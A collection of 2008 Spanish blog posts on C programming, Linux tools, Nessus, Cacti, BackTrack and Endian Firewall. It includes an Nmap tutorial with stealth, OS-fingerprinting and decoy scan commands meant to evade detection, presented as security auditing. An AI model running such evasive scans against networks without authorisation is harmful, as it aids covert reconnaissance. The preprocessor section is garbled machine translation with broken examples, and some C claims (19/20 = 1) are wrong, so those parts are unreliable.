BUENO SIGAMOS C NOS PERMITE GUARDAR LOS DATOS QUE VAYAMOSA CALCULAR EN VARIABLES QUE NOS AYUDARAN A MANUPILAR LOS DATOS Y REGRESAR UN RESULTADO YA COMPUTADO. EXISTEN PALABRAS RESERVADAS EN C Y NOS LA PODEMOS UTILIZAR COMO int, while,for,float. YA QUE TIENEN UN SIGNIFICADO ESPECIAL PARA C. Y TAMPOCO SE PERMITEN PALABRAS QUE EMPIECEN CON NUMEROS Y CARATERES ESPECIALES COMO $ ASI NO PODEMOS NOMBRAR A NUESTRAS VARIABLES.

TENEMOS TRES PROPOSITOS DE UNA DECLARACION ES VARIABLES
1-NOMBRE DE LA VARIABLE
2-TIPO DE LA VARIABLE(ENTERA,DOBLE,FLOTANTE,STRING ,CARACTER)
3.LE DA AL PROGRAMADOR LA DESCRIPCION DE LA VARIABLE

EJEMPLO

int answer;

Esto indica a C que la variable se llama answer y es de tipo entera
la forma general es la siguiente:

tipo nombre; /* comentario */

TAMBIEN PODEMOS IGUALAR EL RESULTADO DE UNA OPERACION A UN AVARIABLE O BLES.

EJEMPLO:

answer = (1 + 2) * 4;

LA FORMA GENERAL ES

VARIABLE = EXPRESION ;

OKAS VAYAMOS A HORA A LAFUNCION printf

printf("Twice %d is %d\n", term, 2 * term); cuando printf encuentra %d imprime el valor siguiente en formato de string.

la forma general de imprimir en pantalla

printf(formato, expresion-1, expresion-2, ...);

ejemplo:

#include
int term; /* la variable entera term se usa en 2 expresiones */
int main()
{
term = 3 * 5;
printf("Twice %d is %d\n", term, 2*term);
printf("Three times %d is %d\n", term, 3*term);
return (0);
}

VARIABLES DE PUNTO FLOTANTE

ESTAS VARIABLES NOS PERMITE HACER OPERACIONES CON VALORES COMO ESTO 5.3 6.4 -12.6 C UTILIZA ELPUNTO DECIMAL PARA DISTINGUIR EL ENTERO Y LAS DECIMALES ADICIONALMENTE SE PUEDE UTILIZAR EXPONENTES e + exp por ejemplo 1.2e34 es lo mismo que 1.2X10 a la 34

su forma general es

float variable; /* comentario */

PARA PRINTF utilizamos %f PARA QUE PODAMOS PLASMAR EL RESULTADO DE UNA OPERACION EN LA PANTALL ASI !!printf("The answer is %f\n", 1.0/3.0);

Floating Point Versus Integer Divide

HAY UNA DIFERENCIA ENTRE INTEGER/FLOAT QUE UN INTEGER/INTEGER EL RESULTADO SE TRUNCA LAS FRACIONES DE DESCARTAN COMO 19/20 = 1 ASI QUE UNA OPERACION FLOTANTE 19.0/10.0 ES 1.9

Expresion Resultado Resultado tipo
1+2 3 Integer
1.0 + 2.0 3.0 Floating Point
19 / 10 1 Integer
19.0 / 10.0 1.9 Floating Point

OS REVOLUTION

2008-02-06T12:25:00.000-08:00

CHESK THIS OUT!!

IEs4Linux

2008-02-05T09:51:00.000-08:00

Bueno como se dieron cuenta algunas veces no hemos visot en la necesidad que los portales que visitamos solo estan diseñados para poder trabajar con internet explorer de micorosft aunque no me gusta mucho pero aveces lo he utilizado talvez para medir y compararlo con otros que la neta para mi el mas chido es firefox..

bueno yo traigo ubuntu 7.10 pero en la la pagian del proyecto viene las intrucciones para instalarlo en otra distro..

http://www.tatanka.com.br/ies4linux/page/Main_Page

1ero hay que bajar estos paquetes..

root@victoria:/home/ekxo# apt-get install cabextract wine

despues de tenerlos instalados debemos bajar el paquete no se recomienda instalarlo como root ya que es inseguro el explorere asi que hagando con otr usuario. vale

ekxo@victoria:~/ies4linux-2.99.0$ sudo useradd -G ekxo iexplorer4linux
[sudo] password for ekxo:

2- despues
wget http://www.tatanka.com.br/ies4linux/downloads/ies4linux-latest.tar.gz
tar zxvf ies4linux-latest.tar.gz
cd ies4linux-*
ekxo@victoria:~/ies4linux-2.99.0$ ./ies4linux --no-gui

IEs4Linux will:
- Instalar Internet Explorers: 6.0
- Usando el idioma de IE: ES
- Instalar Adobe Flash 9.0
- Instalar todo en: /home/ekxo/.ies4linux
[ OK ]

Descargando todo lo que necesitamos
Downloading from microsoft.com:
DCOM98.EXE
mfc42.cab
249973USA8.exe
ADVAUTH.CAB
CRLUPD.CAB
HHUPD.CAB
IEDOM.CAB
IE_EXTRA.CAB
IE_S1.CAB
IE_S2.CAB
IE_S5.CAB
IE_S4.CAB
IE_S3.CAB
IE_S6.CAB
SETUPW95.CAB
FONTCORE.CAB
FONTSUP.CAB
VGX.CAB
100% SCR56EN.CAB
Downloading from macromedia.com:
100% swflash.cab
[ OK ]

Instalando IE 6
Iniciando
Creando prefijo de Wine
Extrayendo archivos CAB
Instalando IE 6
Instalando DCOM98
Instalando fuentes TTF
Instalando ActiveX MFC42
Instalando RICHED20
Instalando el registro
Finalizando
[ OK ]

Instalando Flash Player 9
Extrayendo archivos
Instalando Flash ie6
Finalizando
[ OK ]

IEs4Linux installations finished!

Para ejecutar IE escribe:
/home/ekxo/bin/ie6

echo "Nessus ESCANER DE VULNERABILIDADES OPEN sOURCE"

2008-02-01T22:40:00.000-08:00

hola !! bueno ahora hablaremos de NESSUS Y COMO INSTALARLO YO UTLIZO UBUNTU Y ME BASARE EN EL AUNQUE NO EXISTE GRAN IMPORTACIA SI UTILIZAMOS ALGUNA OTRA DISTRO DE HECHO HAY ALGUNAS QUE YA VIENE JUNTO CON ELLA.

1.- Bueno debemos registrarnos en la pagina oficial y tener una salida a la matrix para poder hacer la instalacion de manera facil

bajamos la ultima version que es la 3 de : http://www.nessus.org/download/nessus_download.php

2.-Debemos agregar un usuario que es el que tendra accesos a nuestro servidor.

root@victoria:/usr/local# /usr/sbin/nessus-adduser
Using /var/tmp as a temporary file holder

Add a new nessusd user
----------------------

Login : ekxo
Authentication (pass/cert) [pass] :
Login password :
Login password (again) :

User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that ekxo has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser(8) man page for the rules syntax

Enter the rules for this user, and hit ctrl-D once you are done :
(the user can have an empty rules set)

Login : ekxo
Password : ***********
DN :
Rules :

Is that ok ? (y/n) [y] y
user added.

3.- root@victoria:/usr/local# /etc/init.d/nessusd start
con esto iniciamos el demonio de nessus
4.- recibiran un correo como esto:
Thank you for downloading Nessus !

The direct link to the Nessus 3 packages is :

(the link above will be valid for 12 hours)

Your activation code for the Nessus plugin feed is C57C-79A8-F25C-7D97-8099

On Linux, to activate your account, simply execute the following command :

/opt/nessus/bin/nessus-fetch --register C57C-79A8-F25C-7D97-8099

If your Nessus installation can not reach the internet directly,
you can use your activation code at the following URL :

http://plugins.nessus.org/offline.php (Nessus 3.x)
http://plugins.nessus.org/manual-register.php (Nessus 2.x)

5.-actualizar los pulgins

root@victoria:/usr/local# /usr/sbin/nessus-update-plugins

6.- verificamos que el codigo de activacion este bien y los pugins han sido actualizados de manera exitosa
root@victoria:/usr/local# /usr/bin/nessus-fetch --check
nessus-fetch is properly configured to receive a plugin feed

7.- podemos tambien meterlos en el cron.
root@victoria:/usr/local# crontab -e
# m h dom mon dow command
28 9 * * * /usr/sbin/nessus-update-plugins
8.- lanzamos el cliente nessus

C A C T I OPEN OPENSOURCE SOLUTIONS

2008-02-01T10:58:00.000-08:00

BUENO AHORA TOCA HABLAR MAS SOBRE SOLUCIONES OPEN SOURCE Y ESTA ESTA ENFOCADA A CACTI :

Es una completa solución de gráficos de red diseñados para aprovechar el poder de RRDTool y del almacenamiento de datos y la funcionalidad de la representación gráfica.

Cacti proporciona un rápido poller, gráfico de plantillas avanzado, múltiples métodos de adquisición de datos, y características de gestión de los usuarios. Todo esto está envuelto en una interfaz intuitiva y fácil de utilizar que tiene sentido para LAN de gran tamaño hasta instalaciones de redes complejas con cientos de dispositivos.

Su instalacion nos es dificil por ejemplo en ubuntu o debiab solo basta un apt-get pero pues hablaremos despues de su instalacion y configuracion en el servidor y cliente.

Cacti es una interfaz completa para RRDTool, almacena toda la información necesaria para crear gráficos y rellenar con los datos en una base de datos MySQL. La interfaz es totalmente impulsada por PHP. Junto con la posibilidad de mantener Gráficos, Fuentes de Datos, Archivos y Round Robin en una base de datos, cacti maneja la recopilación de datos. También existe soporte SNMP para los que se utilizan para la creación de gráficos de tráfico con MRTG.

Fuentes de datos

Para manejar la recopilación de datos, puede alimentar cacti los caminos externos a cualquier script / comando junto con los datos que el usuario tendrá que "rellenar", cacti entonces reune estos datos en un puesto de trabajo del cron y luego poblar una base de datos MySQL / la Archivos del round robin.

Las fuentes de datos pueden ser creados, y los datos corresponden con los datos reales en el gráfico. Por ejemplo, si un usuario desea graficar los tiempos de ping a un host, podría crear una fuente de datos utilizando un script que pings que devuelve su valor en milisegundos. Después de definir las opciones para RRDTool como la forma de almacenar los datos que usted será capaz de definir cualquier información adicional que la fuente de entrada de datos requiere, como un anfitrión de ping en este caso. Una vez que la fuente de datos es creada, ésta es automáticamente se mantiene intervalos de 5 minutos.

Gráficos
Una vez que una o más fuentes de datos están definidas,una instancia de RRDTool pueden crear los graficos utilizando los datos. Cacti te permite crear casi cualquier imaginable con RRDTool utilizando todos los standares tipos y funciones de consolidación. Un área de selección de colores y función de relleno automático de texto también ayuda en la creación de gráficos para hacer el proceso más fácil.

No sólo puede crear gráficos basados en RRDTool pero hay muchas maneras para mostrarlos. Junto con una norma "vista de la lista" y un "modo de vista previa", que se asemeja a la RRDTool frontend 1 existe una "vista en árbol", que le permite poner a los gráficos en un árbol jerárquico para los fines de organización.

Gestión de Usuarios
Debido a las múltiples funciones de cactis, nos provee de herramienta de gestión basada en usuario se construye en lo que se pueden añadir usuarios y darles derechos a ciertas zonas de cactis. Esto permitiría a alguien a crear algunos usuarios que pueden cambiar los parametros de la grafica mientras que otros sólo pueden ver los gráficos. Cada usuario también mantiene su propia configuración cuando se trata de ver los gráficos.

Plantillas
Por último, el cactis es capaz de escalar un gran número de fuentes de datos y gráficos a través de la utilización de plantillas. Esto permite la creación de una única fuente de datos o gráfico de la plantilla que define cualquier gráfico o fuente de datos asociados con él. como una plantilla del localhost le permiten definir la capacidad de cacti de modo que se pueda la adición de un nuevo dispositivo de la mismca clase.

La instalacion no es del nada dificil pero tambien se necesitara la configuracion de dsipositivos .con snmp y talvez crear algun script en c o en shell si quieremos algo mas complexo. en mi caso uso debian y solo basta un apt-get pata imstalarlo pero veremos despues la manera de hacerlo en distros basadas en RH ..YA QUE SE NECESITARA INSTALAR algunas librerias y servidores..

INTRODUCCION A NMAP 2

2008-01-31T15:39:00.000-08:00

Introducción a Nmap.

Nmap ("Network Mapper") , es una herramienta open source, diseñada
para explorar y para realizar auditorias de seguridad en una red
de computadoras.
A continuación se presentan ejemplos de utilización de esta poderosa
herramienta.
*Nota: esta herramienta puede ser utilizada para realizar auditorias de seguridad
en una red, pero también puede ser utilizada para fines delictivos, ya que esta
herramienta pone al descubierto, puertos abiertos en las computadoras de una red,
así como también es posible conocer como se encuentra organizada, y de cuantas
computadoras consta una red.

Alguien dijo una vez, que la mejor forma de comprobar la seguridad de
nuestra red, es tratar de romper por nosotros mismos dicha
seguridad.
solo de esta forma podremos conocer y quitarnos falsas creencias de que
nuestra red es lo suficiente segura.
Además, si Ud. cree que su red es insegura, no se preocupe, que si
existe una forma fácil y rápida de protegerse: por favor desconecte el cable de red.
Pero esta vez conoceremos formas básicas y no tan básicas de realizar
auditorias en nuestra red de computadoras, para que no tenga que
desconectar su cable de red ;) .
Nmap puede bajarse del sitio oficial en de esta dirección:
http://www.insecure.org/nmap/

Manos a la obra.
La sintaxis básica de nmap es:
nmap [tipo de scan] [opciones]
Por ejemplo si tenemos un host en nuestra red, con direccion ip
192.168.0.1 y deseamos conocer que puertos tiene abiertos,
ejecutamos:
-------------------------------------------------------------------------
# nmap 192.168.0.1
Nmap nos mostrara en pantalla algo como esto:
Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Interesting ports on localhost (192.168.0.1):
(The 1545 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
25/tcp open smtp
111/tcp open sunrpc
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 0 seconds
-------------------------------------------------------------------------
Este resultado puede variar, dependiendo de las opciones que se le
pasen a nmap o de la cantidad de puertos, que se encuentren abiertos en el host, que esta siendo "scaneado".
Si queremos, conocer que tipo de sistema operativo, esta corriendo el
host al que le realizamos el scaneo, sólo basta agregar el parámetro -O a el comando nmap.
-------------------------------------------------------------------------
# nmap -O 192.168.0.1
nos mostrara un resultado como este:

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Interesting ports on localhost (192.168.0.1):
(The 1545 ports scanned but not shown below are in state: closed)
Port State Service
22/tcp open ssh
25/tcp open smtp
111/tcp open sunrpc
6000/tcp open X11
No exact OS matches for host (If you know what OS is running on it, see
http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=2.54BETA30%P=i386-suse-linux%D=7/20%Time=3D39A479%O=22%C=1)
TSeq(Class=RI%gcd=1%SI=1B445E%IPID=Z%TS=100HZ)
TSeq(Class=RI%gcd=1%SI=2E12CD%IPID=Z)
T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW)
T1(Resp=Y%DF=Y%W=7FFF%ACK=O%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW)
T3(Resp=Y%DF=Y%W=7FFF%ACK=O%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Nmap run completed -- 1 IP address (1 host up) scanned in 12 seconds
-------------------------------------------------------------------------
Este es el resultado que mostró el comando, al realizar un scaneo a una
pc con Linux, distribución SuSE Linux.

Pero como hace nmap, para reconocer el sistema operativo, que se
esta ejecutando en el host destino?.
Básicamente, cada sistema operativo, responde diferente, cuando se le
envían paquetes tcp específicos, así se logra determinar con una buena exactitud,que sistema operativo se esta
ejecutando.
Al ejecutar nmap, contra un host con sistema operativo Windows XP, se produjo este resultado:
-------------------------------------------------------------------------

# nmap -O 192.168.0.1

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.2):
(The 1544 ports scanned but not shown below are in state: closed)
Port State Service
135/tcp open loc-srv
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open listen
5000/tcp open fics
Remote OS guesses: Windows Me or Windows 2000 RC1 through final
release, Windows Millenium Edition v4.90.3000
Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
-------------------------------------------------------------------------
Ahora, veremos un par de opciones más interesantes que posee nmap.
Identificando los hosts activos, en nuestra red.
Supongamos, que tenemos una red, 192.168.0.x, y deseamos conocer que
hosts se encuentran activos, fácilmente, lo podemos saber con nmap, esto lo
podemos conocer al realizar un ping scan.

#nmap -sP 192.168.0.1-255
Realizando Stealth Scans .
Con este tipo de scan, se pretende no ser detectado por software de
detección de scaneos, se envían paquetes a los hosts con ciertos "flags" TCP
activados o desactivados para evitar ser detectados.
sN: Stealth, Null Scan, este tipo de scan pone en off todos los flags.
sF: Stealth FIN Scan, este tipo de scan usa paquetes con el flag FIN
activado para las prueba
sX: Stealth Xmas Tree Scan, este tipo de scan envia paquetes con los
flag FIN, URG, y PUSH activados.
sp: Ping Scan, realiza un scan dentro de un rango especifico de hosts.
útil para conocer que hosts se encuentran en linea sin ser detectados.

Si deseamos hacer un stealth scan del tipo Xmas Tree, y ademas deseamos
conocer que sistema operativo esta corriendo
el host de destino, ejecutamos:

#nmap -sX -O 192.168.1.2

Despistalo con un Decoy Scan:

-D: Esta opción se utiliza para tratar de engañar al host, al
cual se esta "scaneando", que los scans se estan generando
desde otros hosts, que se especifican en la opción -D.
En el siguiente ejemplo, realizamos un Stealth Xmas Tree scan (-sX) hacia el
host 192.168.0.1, en los puertos 25(SMTP), 53(DNS), le indicamos a
nmap que no genere pings hacia el host, y tratamos de engañar al host
(-D, Decoy), haciendole creer que los scans se estan generando desde los hosts 1.2.3.4 y 5.6.7.8.

#nmap -p 25,53 -sX -P0 -D 1.2.3.4,5.6.7.8 192.168.0.1

Guardando los resultados de tus scans.

Nmap permite guardar los resultados de un scan, en varios tipos de
formato de archivo: Normal, XML, Grepable, All, y en formato "S" (s|arGuMEnT!, o mejor conocido como formato Script Kiddie!).

Si deseamos hacer un stealth scan del tipo Xmas Tree, también deseamos
conocer que sistema operativo esta corriendo el host de destino, y ademas deseamos guardar el resultado de este scan
en un archivo llamado "scanresult.txt", ejecutamos:

#nmap -sX -O 192.168.1.2 -oN scanresult.txt

Ahora si lo que deseamos es realizar el scan anterior pero dentro de un rango de hosts específicos,
digamos del host 192.168.1.1 hasta la ip 192.168.1.255 , y deseamos guardar el resultado del scan
en un archivo de texto normal entonces ejecutamos:
#nmap -sX -O 192.168.1.1-255 -oN scanresult.txt

Interfaces Gráficas para Nmap.
Si no desean, utilizar la interfaz de comandos de nmap, facilmente
pueden utilizar 2 de las interfaces gráficas mas conocidas, que existen para nmap.
*nmapFE
*KMAP
Espero que este articulo les resulte útil en sus auditorias de seguridad, ya que solo conociendo las vulnerabilidades
que existen en nuestras redes, sabremos que medidas tomar para protegernos mejor.

IDE FOR LINUX

2008-01-30T21:45:00.000-08:00

HABLEMOS AHORA DE INTERFACES DE DESARROLLO YA QUE LINUX NO SE QUEDA ATRAS TENEMOS VARIAS HERRAMIENTAS QUE USAREMOS PARA EL DESARROLLO BUENO DEPENDE CON CUAL NOS ACOPLEMOS MAS.

BACKTRACK

2008-01-29T15:49:00.000-08:00

¿Qué es de BACKTRACK?

Es una colecion de Seguridad en un sistema de CD en live basado en Slax. Sin instalación
Alguna, la plataforma de análisis de la seguridad se inicia directamente desde el CD-Rom / USB / Red o RAM y es totalmente accesible en cuestión de minutos. Independiente del hardware utilizado, el BACKTRACK ofrece una colección de HERRAMIENTAS de seguridad , entorno de trabajo de auditoría, l.Incluso durante la planificación y EL objetivo era lograr una excelente facilidad de uso combinado con una Óptima gama de herramientas. con programas opensource se puede analizar Su seguridad, byte a byte.

Cuenta con el apoyo de reconocidos fases de un control de seguridad.Escaneo, wireless,Adecuada. Además de los alrededor de 300 herramientas, la seguridad de BACKTRACK Colección contiene un entorno de trabajo para herramientas y configuraciones complejas, como Snort, ntop,
Db_autopwn, kismet con gps apoyo, kismet automáticas, de apoyo y unicornscan pgsql

Otros unas características ingeniosas.
Actualidad herramientas de productividad tales como el navegador web, editores gráficos y herramientas le permiten crear o Editar los textos y fotografías de informes, directamente dentro de la plataforma de seguridad de bACKTRACK.

Distribucion GNU/LINUX Endian.

2008-01-24T15:20:00.000-08:00

GNU/LINUX Endian.
Endian Firewall Security Appliances
Endian Firewall es una distribución linux que convierte, a todo el sistema completamente en un dispositivo de seguridad. El software ha sido diseñado con "facilidad de uso" y es muy fácil de instalar, utilizar y administrar, sin perder su flexibilidad ya que Las características incluyen un firewall de inspección de estado de paquetes, proxies a nivel de aplicación para los distintos protocolos (HTTP, POP3, SMTP, SIP) con el apoyo del antivirus, y spamfiltering para tráfico de correo electrónico (POP y SMTP), el filtrado de contenidos de la web de tráfico y una "solución VPN (basado en OpenVPN).

La principal ventaja de Endian Firewall ™ es que se trata de una pura Solucion "Open Source"..

Caracteristicas

- Módulo de Base - Endian Firewall 1,1
- Firewall (inspección Stateful)
- IPSec VPN Gateway a la puerta de enlace
- Remoto IPSec VPN de cliente a puerta de enlace
- NAT - Multi-dirección IP de apoyo (alias)
- Dynamic DNS - DMZ apoyo
- HTTPS Interfaz Web
- Detallados gráficos de tráfico de la red
- Ver las conexiones activas actualmente
- Administración de registros de sucesos
- Acceda al log a un servidor externo
- Servidor DHCP
- Servidor NTP
- Traffic Shaping / QoS
- Transparente POP3 antivirus / antispam proxy
- HTTP proxy transparente
- Web Proxy con los usuarios locales , De dominio de Windows, samba, LDAP.
- Radius server management
- Sistema de Detección de Intrusión
- Apoyo para modem ADSL - Configuración de copia de seguridad y restauración
- Actualización remota
- VoIP SIP Proxy * NUEVO!
- Módulo Antivirus basado en clamav
- Endian Firewall 1,1
- HTTP Antivirus
- Herramientas para la Seguridad Endian ws
- Transparente SMTP antivirus / antispam proxy.
- VPN Gateway Module
- Gateway como puerta de enlace VPN con OpenVPN
- Cliente remoto a VPN gateway (roadwarrior) con OpenVPN
- Puente y VPN modo Routedor
- Endian Cliente VPN - Windows, Linux, MacOSX
- Modulo de Filtro de Contenido Web , Listas blancas y listas negras de gestión
- Límites de tiempo de navegación en la Web
Servidor de ssh

Lo podemos sintetizar en los siguientes puntos importantes.

1-Escalable con Hardware
2-Proteccion contra Zero Day Attacks
3-Fácil, rápida y seguro SSL VPN
4-Gateway Antivirus
5-Web Seguridad web
6-Seguridad Email
7-Comprensivo Mudulo de Licensiamiento.
8- Avanzado Modulo de Networking
9- Completa seguridad, escalabilidad y estabilidad atravez de una gestion unificada de amenazas

Se integra una interfaz web que nos permite administrar y configurar los servicios que tengamos que utilizar , lo veremos mas adelante.

by JONATHAN ANGELES GARCIA.
EKXO

Programando en C whit Linux (funciones)

2008-01-24T08:38:00.000-08:00

Empezamos por saber que es una funcion , bueno la idea de una funcion es encapsular un procedimiento o idea del programa en un nombre para poder usarlo en varias partes del programa con solo llamarlo.existe una funcion con un nombre muy especial es una funcion llamada main() es la primera funcion que entra cuando un programa empieza a correr , cuando el progama deja la funcion main se al final del programa. aqui hay un example..

root@victoria:~#vim ejemplo.c

#include
/*
* AQUI LE DECIMOS AL COMPILADOR QUE VAMOS A INTENTAR USAR LA FUNCION show_message.
* QUE NO TIENE ARGUMENTOS Y NO REGRESA NINGUN VALOR..
* DECLARACON ES LA SIGUIENTE..
*
*/
void show_message(void);

main(){
int count;
count = 0;
while(count < 10){
show_message();
count = count + 1;
}
exit(0);
}
/*
* LAS SIGUIENTES LINEAS SON DE UNA FUNCION SIMPLE.
* AQUI ESTA LA DEFINICION
*/
void show_message(void){
printf("hello\n");
}
OKAS!!!!!!!!! CORRANLO..

Programando en C whit linux

2008-01-22T16:02:00.000-08:00

NADIE SE SALVA DEL HOLA MUNDO TAL VEZ SEA MUY TONTO PERO ASI SE EMPIEZA PORLO MAS SENCILLO HASTA HACER ALGO MAS INTERESANTE. yo utilizo gnu/gcc como compilador ustedes pueden utilizar otro pero a mi pareser es el mas chingon.

1.UTILIZAMOS UN EDITOR DE TEXTO EN MI CASO VIM TENIENDO EN CUENTA QUE MI ARCHIVO SE LLAMARA HOLA.C

root@victoria:~# vim hola.c
y el codigo es algo asi

#include
main()
{
printf("linux 4 everyone\n");
}

The first C program

cerramos y guardamos el editor

2.ahora compilamo y generamos el ejecutable
POR LO REGULAR LA SALIDA DE NUESTRO PROGRAMA SE LLAMARIA o.out pero LA PODEMOS MODIFICAR CON EL PARAMETRO -o asi quedara COMO EKXO

root@victoria:~#gcc hola.c -o EKXO

LA SALIDA DEL PROGRAMA ES ESTA:

root@victoria:~#./EKXO

linux 4 everyone

BUENO AHORA PUS QUE TAL SI HACEMOS UN FORMULAZO..formula oC=(5/9) (oF-32) PARA TENER LA TABLA DE TEMPERATURA Fahrenheit Y CENTIGRADOS Y SU EQUIVALENTE EN Celsius..

/*#include ,,,,no se por que rayos no se ve completa esta linea en el post pero primero incluimos las librerias estandar stdio.h*/

#include

/* Este programa imprime la tabla Fahrenheit-Celsius
for fahr = 0, 20, ..., 300 */
main()
{
int fahr, celsius;/*variables de tipo entero*/
int lower, upper, step;
lower = 0; /* escala de temperatura baja */
upper = 300; /* limite alto */
step = 20; /* tamaño de paso */
fahr = lower; /*inicializamos a fahr en 0 */
while (fahr <= upper) {
celsius = 5 * (fahr-32) / 9;
printf("%d\t%d\n", fahr, celsius);
fahr = fahr + step;
}
}

[ekxo@desarrollo ~]$ gcc temperatura.c -o temperatura
[ekxo@desarrollo ~]$ ./temperatura
0 -17
20 -6
40 4
60 15
80 26
100 37
120 48
140 60
160 71
180 82
200 93
220 104
240 115
260 126
280 137
300 148

AQUI INDICAMOS QUE LAS VARIABLES SON ENTERAS ,EN LA DECLARACION DE VARIABLES SE DEBE TERMINAR CON [;] POR EL CONTRARIO ALAS VARIABLES TIPO FLOAT QUE TIENEN PARTE FRACCIONARIA C TIENE ADEMAS DE ESTOS TIPOS DE VARIABLES LAS SIGUIENTES TAMBIEN.

char character - a single byte
short short integer
long long integer
double double-precision floating point

int fahr, celsius;
int lower, upper, step;

AQUI INICIALIZAMOS LAS VARIABLES.

lower = 0;
upper = 300;
step = 20;

Cada línea de la tabla se calcula de la misma manera, por lo que SE USA un bucle que se repite una vez por salida , que es la finalidad del bucle while

while (fahr <= upper) {
...
}

Mientras que (fahr <= superior) (
...
)

El bucle while funciona de la siguiente manera: la condición entre paréntesis se prueba. Si es verdad (fahr Es menor o igual a upper), el cuerpo del bucle continua con (los tres estados encerrado entre llaves)Se ejecutan. Entonces, la condición es volver a la prueba, y de ser ciertas, el cuerpo se ejecuta de nuevo. Cuando se Prueba se convierte en falsa (fahr supera upper), el bucle termina, y la ejecución continúa en la Declaración que sigue despues del bucle. y como No hay más declaraciones en este programa,Termina. okas..

USANDO GNU/GCC El preprocesador

2008-01-20T19:35:00.000-08:00

DIRECTIVAS:

La directiva # define crea la definición de una macro. La macro tiene un nombre que,
Cuando se encuentran en otra parte del texto, se sustituye por la cadena de caracteres definidos como El valor de la macro. Es posible especificar los parámetros que se van a usar como parte
Expansión de la macro.La mayoría de las definiciones macro son, en efecto, constantes con nombre. Estos nombres son tradicionalmente En letras mayúsculas.

Por ejemplo ESTA , la siguiente definición crea un macro llamado

ARRAY_SIZE que hará que el valor de la inserción de 512 dondequiera que se utiliza en la
Código fuente:

#define ARRAY_SIZE 512

Este macro pueden utilizarse posteriormente para declarar una matriz de tamaño especificado,
De la siguiente manera:

int valarray[ARRAY_SIZE];

El siguiente es un conocido macro que utiliza parámetros para crear una expresión
Que devuelve el mínimo de dos valores:

#define min(a,b) ((a) < (b) ? (a) : (b))

# Define Define un nombre como una macro que se expandirá el preprocesador

En el código de cada lugar se utiliza el nombre.
Proporciona una alternativa de expresión a ser evaluada por un
# Elif
# Si directiva.
Proporciona un conjunto alternativo de código para ser compilado si un
# Otra persona
Si #, # ifdef, # ifndef o es falsa.
Usando el compilador
Produce un mensaje de error y detiene el preprocesador.
# Error
COLECCIÓN
Compila el código entre esta directiva y su equiparación
# Si
# Endif sólo si evaluar una expresión aritmética de los resultados
En un valor distinto de cero.
Compila el código entre esta directiva y su equiparación
# Ifdef
# Endif sólo si el nombre de macro ha sido definido.
Compila el código entre esta directiva y su equiparación
# Ifndef
# Endif sólo si el nombre de macro no se ha definido.
Las búsquedas a través de una lista de directorios hasta encontrar el nombre
# Include
Archivo; entonces se inserta el contenido del archivo como si se hubiera
Insertado por un editor de texto.
Include_next # # El mismo que incluyen, pero esta directiva comienza la búsqueda
Para el archivo en el directorio siguiente a aquel en el que el
Archivo actual se encontró.
Especifica el número de línea, y, posiblemente, el nombre del archivo, que
# Línea
Se informa que el compilador que se utilizará para crear la depuración
Información en el archivo objeto.
Un método estándar de proporcionar información adicional
# Pragma
Que pueden ser específicas para un compilador o una plataforma.
Elimina una definición previamente creadas por un # define
# Undef
Directiva.

#warning Produce un mensaje de advertencia desde el preprocesador.

## El operador de concatenación, que se puede utilizar dentro de
Una macro para combinar dos cadenas en una sola.

esta macro puede ser ampliado en el código fuente mediante el uso de su nombre y valores
Para ser sustituido por a y b:
Resultado = min (44, uplim);
El código de esta macro ampliado tendrá este aspecto:
Resultado = ((44) <(uplim)? (44): (uplim));
La siguiente es una lista de características y reglas que se aplican a las macro definiciones:
■ Una macro definición figura en una línea. Si usted necesita escribir en múltiples
O líneas de claridad, debido a su longitud, puedemos hacerlo mediante el uso de la barra invertida como
Una línea continua, como en el ejemplo siguiente, que es la expresión
Int devolver un valor aleatorio en el rango especificado:
# Define corrió (baja, alta) \
((Int) random ()% (alta-baja +1)) \
+ Baja
■ El preprocesador procesos en el texto y sólo para hacer macro
Sustituciones después de la macro se ha definido.
Por ejemplo, en los siguientes
Cuatro líneas de código, la macro B se utiliza una vez antes de que se ha definido y
Una vez después de:
# Define A 100
Suma = A + B;
# Define B 200
Suma = A + B;
El resultado de preprocesamiento de estas cuatro líneas es la siguiente:
Suma + B = 100;
Suma = 100 + 200;
■ Las sustituciones son recursivo, por lo que pueden ser anidados uno dentro del otro. Es decir,
Una vez a la sustitución se ha hecho, el proceso de preprocesador que el mismo texto
De nuevo a realizar más sustituciones. El siguiente ejemplo muestra cómo una
Macro puede ser sustituido por otro:
# Define TANKARD TSIZE
# Define TSIZE 100
Tank1 = TANKARD;
# Define TSIZE 200
Tank2 = TANKARD

Preprocesamiento de estas cinco líneas de resultados en las siguientes:
Tank1 = 100;
Tank2 = 200;
■ Para cambiar la definición de una macro, es necesario eliminarla y definirlo
Una vez más, como en el ejemplo siguiente:
# Define MLKEYVAL 889
# Undef MLKEYVAL
# Define MLKEYVAL 890
Preprocesamiento de estas cinco líneas de resultados en las siguientes:
Tank1 = 100;
Tank2 = 200;
■ Para cambiar la definición de una macro, es necesario eliminarla y definirlo
Una vez más, como en el ejemplo siguiente:
# Define MLKEYVAL 889
# Undef MLKEYVAL
# Define MLKEYVAL 890

Usando el compilador

■ Para una macro que se define como aquel que tiene parámetros, no debe haber espacios
COLECCIÓN
Entre el nombre de la macro y el paréntesis.

El siguiente ejemplo
Muestra una macro definida con parámetros y uno con una cadena simple
La sustitución:
